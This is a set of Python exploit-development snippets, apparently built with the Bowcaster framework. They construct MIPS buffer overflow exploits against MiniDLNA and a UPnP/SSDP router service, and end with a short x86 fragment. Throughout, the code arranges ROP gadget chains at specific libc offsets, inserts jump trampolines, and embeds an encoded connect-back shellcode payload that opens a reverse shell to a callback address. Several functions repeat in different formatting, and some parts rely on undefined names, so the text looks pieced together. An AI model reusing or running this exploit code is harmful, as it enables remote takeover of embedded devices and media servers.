def build_overflow(self,
target_ip_address,
encoder_class=None,
qemu=False):
badbyte_list = ['\x00']
for k in self.__class__.minidlna_badbytes.keys():
badbyte_list.append(k)
sc = SectionCreator(self.endianness, badchars=badbyte_list)
#Must take into account length if IP addr
#since it's part of the sprintf() that overflows
offset_modifier = self.offset_modifier
sections = self.__class__.minidlna_rop_gadgets(self.offset_modifier,
qemu)
trampoline_1 = Trampoline(self.endianness, -672)
section = sc.string_section(
684 - offset_modifier,
trampoline_1.shellcode,
description="First trampoline payload, jump back 672")
sections.append(section)
#1028, or 0x404, is the smallest operand to MIPS beq that
#can >>2 bits and still have both bytes be non-null
trampoline_2 = Trampoline(self.endianness, 1028)
section = sc.string_section(
16 - offset_modifier,
trampoline_2.shellcode,
description="Second trampoline payload, jump forward 1028 ")
sections.append(section)
payload = ConnectbackPayload(self.callback_ip_address,
self.endianness,
port=self.port)
if encoder_class:
encoded_payload = encoder_class(payload, badchars=badbyte_list)
payload = encoded_payload
section = sc.string_section(1048 - offset_modifier,
payload.shellcode,
description="connect-back payload")
sections.append(section)
buf = OverflowBuffer(self.endianness,
self.overflow_len,
sections,
logger=self.logger)
return buf
def build_overflow(self,target_ip_address,encoder_class=None,qemu=False):
badbyte_list=['\x00']
for k in self.__class__.minidlna_badbytes.keys():
badbyte_list.append(k)
sc=SectionCreator(self.endianness,badchars=badbyte_list)
#Must take into account length if IP addr
#since it's part of the sprintf() that overflows
offset_modifier=self.offset_modifier
sections=self.__class__.minidlna_rop_gadgets(self.offset_modifier,qemu)
trampoline_1=Trampoline(self.endianness,-672)
section=sc.string_section(684-offset_modifier,
trampoline_1.shellcode,
description="First trampoline payload, jump back 672")
sections.append(section)
#1028, or 0x404, is the smallest operand to MIPS beq that
#can >>2 bits and still have both bytes be non-null
trampoline_2=Trampoline(self.endianness,1028)
section=sc.string_section(16-offset_modifier,
trampoline_2.shellcode,
description="Second trampoline payload, jump forward 1028 ")
sections.append(section)
payload=ConnectbackPayload(self.callback_ip_address,self.endianness,port=self.port)
if encoder_class:
encoded_payload=encoder_class(payload,badchars=badbyte_list)
payload=encoded_payload
section=sc.string_section(1048-offset_modifier,
payload.shellcode,
description="connect-back payload")
sections.append(section)
buf=OverflowBuffer(self.endianness,self.overflow_len,sections,logger=self.logger)
return buf
from bowcaster.development.overflowbuilder import SectionCreator, OverflowBuffer
from bowcaster.common.support import LittleEndian
from bowcaster.payloads.mips.connectback_payload import ConnectbackPayload
from bowcaster.encoders.mips import MipsXorEncoder
sleep_addr = 0x77ef1a40
qemu_libc_base=0x77e3b000
sleep_offset = sleep_addr - qemu_libc_base
badchars = ['\n']
SC=SectionCreator(LittleEndian, base_address=qemu_libc_base, badchars=badchars)
sections=[]
#ROP 1
section = SC.gadget_section(516, 0x193A8,
description="load a portion of overflowed stack \
into $ra and $s0-$s5")
## 000193A8 lw $ra, 0x58+var_4($sp)
## 000193AC lw $fp, 0x58+var_8($sp)
## 000193B0 lw $s7, 0x58+var_C($sp)
## 000193B4 lw $s6, 0x58+var_10($sp)
## 000193B8 lw $s5, 0x58+var_14($sp)
## 000193BC lw $s4, 0x58+var_18($sp)
## 000193C0 lw $s3, 0x58+var_1C($sp)
## 000193C4 lw $s2, 0x58+var_20($sp)
## 000193C8 lw $s1, 0x58+var_24($sp)
## 000193CC lw $s0, 0x58+var_28($sp)
## 000193D0 jr $ra
## 000193D4 addiu $sp, 0x58
sections.append(section)
#ROP2
qemu_libwlbcmshared_base=0x40942000
qemu_libc_base=0x4085b000
actual_libc_base=0x2aabe000
actual_libwlbcmshared_base=0x2aba1000
if QEMU:
libc_base=qemu_libc_base
libwlbcmshared_base=qemu_libwlbcmshared_base
else:
libc_base=actual_libc_base
libwlbcmshared_base=actual_libwlbcmshared_base
SC=SectionCreator(BigEndian,base_address=libc_base,badchars=["\x00"])
################################################################################
#an address in libwlbcmshared.so
#index in +0x50 is a a pointer that points to itself.
#That pointer + 0x2c is all NULL bytes and
#should cause ssdp_msearch_repsonse() to bail without crashing
################################################################################
section=SC.gadget_section(140,
0x1ECBC,
base_address=libwlbcmshared_base,
description= "upnp_context placeholder.")
################################################################################
def minidlna_rop_gadgets(cls,offset_modifier,qemu=False):
libc=0
#libavcodec=0
badbyte_list=['\x00']
for k in cls.minidlna_badbytes.keys():
badbyte_list.append(k)
if qemu:
libc=cls.libc_qemu
#libavcodec=cls.libavcodec_qemu
else:
libc=cls.libc_actual
#libavcodec=cls.libavcodec_actual
sc=SectionCreator(cls.endianness,base_address=libc,badchars=badbyte_list)
reg_ra=600-offset_modifier
reg_s0=564-offset_modifier
reg_s1=568-offset_modifier
reg_s2=572-offset_modifier
reg_s3=576-offset_modifier
reg_s4=580-offset_modifier
reg_s6=588-offset_modifier
gadgets=[]
#placeholders one and two get added together and passed as dst into memcpy(). They must add
#up to be a writable address."
gadget=sc.gadget_section(
#752-offset_modifier,
736-offset_modifier,
0x15a3c932,
base_address=0,
description="placeholder 1 to avoid crashing memcpy.")
gadgets.append(gadget)
gadget=sc.gadget_section(
752-offset_modifier,
0x15a3c932,
base_address=0,
description="placeholder 2 to avoid crashing memcpy.")
gadgets.append(gadget)
#load 1 into $a0, jalr $s3
gadget=sc.gadget_section(reg_ra,
0x00025110,
description="reg $ra. set up 3 sec arg to sleep(). jalr $s6.")
gadgets.append(gadget)
#load stack data into $ra, jr $s1
gadget=sc.gadget_section(reg_s6,
0x0001D95C,
description="[reg $s6] setup ra before sleep(). jr $s1")
gadgets.append(gadget)
#address of sleep
gadget=sc.gadget_section(reg_s1,
0x506c0,
description="[reg $s1] Address of sleep() in libc. be sure to set up $ra and $a0 before calling.",)
gadgets.append(gadget)
#[reg $s3] placeholder that allows $s3 to be dereferenced without crashing.
gadget=sc.gadget_section(reg_s3,
0x00011918,
description="[reg $s3] placeholder that allows $s3 to be dereferenced without crashing.")
gadgets.append(gadget)
#[reg $ra] offset from $sp into $a2, jalr $s1.
gadget=sc.gadget_section(640-offset_modifier,
0x00011918,
description="[reg $ra] offset from $sp into $a2, jalr $s1.")
gadgets.append(gadget)
#move $a2 to $s0, jalr $s4
gadget=sc.gadget_section(632-offset_modifier,
0x0003434C,
description="[reg $s0] move $a2 to $s0, jalr $s4")
gadgets.append(gadget)
gadget=sc.gadget_section(reg_s4,
0x0000BA84,
description="[reg $s4] jalr $s0")
gadgets.append(gadget)
return gadgets
def build_overflow(self,target_ip_address,encoder_class=None,qemu=False):
self.logger.LOG_DEBUG("offset modifier: %d" % self.offset_modifier)
badbyte_list=['\x00']
for k in self.__class__.minidlna_badbytes.keys():
badbyte_list.append(k)
if self.qemu:
libc=self.libc_qemu
else:
libc=self.libc_actual
offset_modifier=self.offset_modifier
reg_ra=600-offset_modifier
reg_s0=564-offset_modifier
reg_s1=568-offset_modifier
reg_s2=572-offset_modifier
reg_s3=576-offset_modifier
reg_s4=580-offset_modifier
reg_s5=584-offset_modifier
reg_s6=588-offset_modifier
reg_s7=592-offset_modifier
#after rop into fn epilogue
new_reg_ra=640-offset_modifier
new_reg_s0=628-offset_modifier
new_reg_s1=632-offset_modifier
new_reg_s2=636-offset_modifier
SC=SectionCreator(self.endianness,base_address=libc,badchars=badbyte_list)
#0x157BB0BA + 0x157BB0BA = 0x2AF76174, which should be somewhere
#in libc's text segment
SC.gadget_section(752-offset_modifier,
0x157BB0BA,
base_address=0,
description="placeholder 1 to avoid crashing memcpy.")
SC.gadget_section(768-offset_modifier,
0x157BB0BA,
base_address=0,
description="placeholder 2 to avoid crashing memcpy.")
SC.gadget_section(reg_ra,0x00028028,
description="[ra] load 1 into $a0, jalr $s3")
SC.gadget_section(reg_s2,0x00028028+0x7E88,
description="[s2] readonly placeholder to avoid crashing rop gadget.")
SC.gadget_section(reg_s3,0x0001D95C,
description="[s3] load stack offset into ra, jalr $s1")
SC.gadget_section(reg_s1,0x000506C0,
description="[s1] address of sleep")
SC.gadget_section(new_reg_ra,0x000427A8,
description="[ra] load $sp+0xE0+var_C0 into $s0, jalr $s6")
SC.gadget_section(reg_s6,0x0000BA84,
description="[s6] jump into stack via $s0")
SC.gadget_section(new_reg_s2,0x00028028,
description="[s2] readonly placeholder to avoid crashing stack finder gadget.")
trampoline_1=Trampoline(self.endianness,-664)
section=SC.string_section(676-offset_modifier,
trampoline_1.shellcode,
description="First trampoline payload, jump back 664")
#1028, or 0x404, is the smallest operand to MIPS beq that
#can >>2 bits and still have both bytes be non-null
trampoline_2=Trampoline(self.endianness,1028)
section=SC.string_section(16-offset_modifier,
trampoline_2.shellcode,
description="Second trampoline payload, jump forward 1028 ")
payload=ConnectbackPayload(self.callback_ip_address,self.endianness,port=self.port)
if encoder_class:
encoded_payload=encoder_class(payload,badchars=badbyte_list)
payload=encoded_payload
#payload has to go at 1048 since trampoline minimum forward jump is
#1028. 1028+trampoline offset+4 = 1048
section=SC.string_section(1048-offset_modifier,
payload.shellcode,
description="connect-back payload")
buf=OverflowBuffer(self.endianness,self.overflow_len,SC.section_list,logger=self.logger)
return buf
def minidlna_rop_gadgets(cls, offset_modifier, qemu=False):
libc = 0
#libavcodec=0
badbyte_list = ['\x00']
for k in cls.minidlna_badbytes.keys():
badbyte_list.append(k)
if qemu:
libc = cls.libc_qemu
#libavcodec=cls.libavcodec_qemu
else:
libc = cls.libc_actual
#libavcodec=cls.libavcodec_actual
sc = SectionCreator(cls.endianness,
base_address=libc,
badchars=badbyte_list)
reg_ra = 600 - offset_modifier
reg_s0 = 564 - offset_modifier
reg_s1 = 568 - offset_modifier
reg_s2 = 572 - offset_modifier
reg_s3 = 576 - offset_modifier
reg_s4 = 580 - offset_modifier
reg_s6 = 588 - offset_modifier
gadgets = []
#placeholders one and two get added together and passed as dst into memcpy(). They must add
#up to be a writable address."
gadget = sc.gadget_section(
#752-offset_modifier,
736 - offset_modifier,
0x15a3c932,
base_address=0,
description="placeholder 1 to avoid crashing memcpy.")
gadgets.append(gadget)
gadget = sc.gadget_section(
752 - offset_modifier,
0x15a3c932,
base_address=0,
description="placeholder 2 to avoid crashing memcpy.")
gadgets.append(gadget)
#load 1 into $a0, jalr $s3
gadget = sc.gadget_section(
reg_ra,
0x00025110,
description="reg $ra. set up 3 sec arg to sleep(). jalr $s6.")
gadgets.append(gadget)
#load stack data into $ra, jr $s1
gadget = sc.gadget_section(
reg_s6,
0x0001D95C,
description="[reg $s6] setup ra before sleep(). jr $s1")
gadgets.append(gadget)
#address of sleep
gadget = sc.gadget_section(
reg_s1,
0x506c0,
description=
"[reg $s1] Address of sleep() in libc. be sure to set up $ra and $a0 before calling.",
)
gadgets.append(gadget)
#[reg $s3] placeholder that allows $s3 to be dereferenced without crashing.
gadget = sc.gadget_section(
reg_s3,
0x00011918,
description=
"[reg $s3] placeholder that allows $s3 to be dereferenced without crashing."
)
gadgets.append(gadget)
#[reg $ra] offset from $sp into $a2, jalr $s1.
gadget = sc.gadget_section(
640 - offset_modifier,
0x00011918,
description="[reg $ra] offset from $sp into $a2, jalr $s1.")
gadgets.append(gadget)
#move $a2 to $s0, jalr $s4
gadget = sc.gadget_section(
632 - offset_modifier,
0x0003434C,
description="[reg $s0] move $a2 to $s0, jalr $s4")
gadgets.append(gadget)
gadget = sc.gadget_section(reg_s4,
0x0000BA84,
description="[reg $s4] jalr $s0")
gadgets.append(gadget)
return gadgets
def build_overflow(self,
target_ip_address,
encoder_class=None,
qemu=False):
self.logger.LOG_DEBUG("offset modifier: %d" % self.offset_modifier)
badbyte_list = ['\x00']
for k in self.__class__.minidlna_badbytes.keys():
badbyte_list.append(k)
if self.qemu:
libc = self.libc_qemu
else:
libc = self.libc_actual
offset_modifier = self.offset_modifier
reg_ra = 600 - offset_modifier
reg_s0 = 564 - offset_modifier
reg_s1 = 568 - offset_modifier
reg_s2 = 572 - offset_modifier
reg_s3 = 576 - offset_modifier
reg_s4 = 580 - offset_modifier
reg_s5 = 584 - offset_modifier
reg_s6 = 588 - offset_modifier
reg_s7 = 592 - offset_modifier
#after rop into fn epilogue
new_reg_ra = 640 - offset_modifier
new_reg_s0 = 628 - offset_modifier
new_reg_s1 = 632 - offset_modifier
new_reg_s2 = 636 - offset_modifier
SC = SectionCreator(self.endianness,
base_address=libc,
badchars=badbyte_list)
#0x157BB0BA + 0x157BB0BA = 0x2AF76174, which should be somewhere
#in libc's text segment
SC.gadget_section(
752 - offset_modifier,
0x157BB0BA,
base_address=0,
description="placeholder 1 to avoid crashing memcpy.")
SC.gadget_section(
768 - offset_modifier,
0x157BB0BA,
base_address=0,
description="placeholder 2 to avoid crashing memcpy.")
SC.gadget_section(reg_ra,
0x00028028,
description="[ra] load 1 into $a0, jalr $s3")
SC.gadget_section(
reg_s2,
0x00028028 + 0x7E88,
description=
"[s2] readonly placeholder to avoid crashing rop gadget.")
SC.gadget_section(
reg_s3,
0x0001D95C,
description="[s3] load stack offset into ra, jalr $s1")
SC.gadget_section(reg_s1,
0x000506C0,
description="[s1] address of sleep")
SC.gadget_section(
new_reg_ra,
0x000427A8,
description="[ra] load $sp+0xE0+var_C0 into $s0, jalr $s6")
SC.gadget_section(reg_s6,
0x0000BA84,
description="[s6] jump into stack via $s0")
SC.gadget_section(
new_reg_s2,
0x00028028,
description=
"[s2] readonly placeholder to avoid crashing stack finder gadget.")
trampoline_1 = Trampoline(self.endianness, -664)
section = SC.string_section(
676 - offset_modifier,
trampoline_1.shellcode,
description="First trampoline payload, jump back 664")
#1028, or 0x404, is the smallest operand to MIPS beq that
#can >>2 bits and still have both bytes be non-null
trampoline_2 = Trampoline(self.endianness, 1028)
section = SC.string_section(
16 - offset_modifier,
trampoline_2.shellcode,
description="Second trampoline payload, jump forward 1028 ")
payload = ConnectbackPayload(self.callback_ip_address,
self.endianness,
port=self.port)
if encoder_class:
encoded_payload = encoder_class(payload, badchars=badbyte_list)
payload = encoded_payload
#payload has to go at 1048 since trampoline minimum forward jump is
#1028. 1028+trampoline offset+4 = 1048
section = SC.string_section(1048 - offset_modifier,
payload.shellcode,
description="connect-back payload")
buf = OverflowBuffer(self.endianness,
self.overflow_len,
SC.section_list,
logger=self.logger)
return buf
sections=[]
def build_part(index, input):
p_string=""
paddind=0
if index:
paddind = input.offset - (sections[index-1].offset + 4)
for byte in input.section_string:
p_string+="\\x"+binascii.hexlify(byte)
if paddind:
return "'" + buf.overflow_string[sections[index-1].offset + 4: input.offset] + "' + '" + p_string + "'"
return "'" + p_string + "'"
libc_base=0xb7e2d000
badchars = ['\n']
SC=SectionCreator(LittleEndian, base_address=libc_base, badchars=badchars)
#gadget 1
EIP_pos = 68
gadget_address = 0xf2ad1
section = SC.gadget_section(EIP_pos, gadget_address,
description="load a portion of overflowed stack into \
ecx, eax")
#0xb7f1fad1 <__fentry__+17>: pop %ecx
#0xb7f1fad2 <__fentry__+18>: pop %eax
#0xb7f1fad3 <__fentry__+19>: ret
sections.append(section)
exit_address = 0x00032be0
section = SC.gadget_section(72, exit_address, description="load exit address into ecx")
sections.append(section)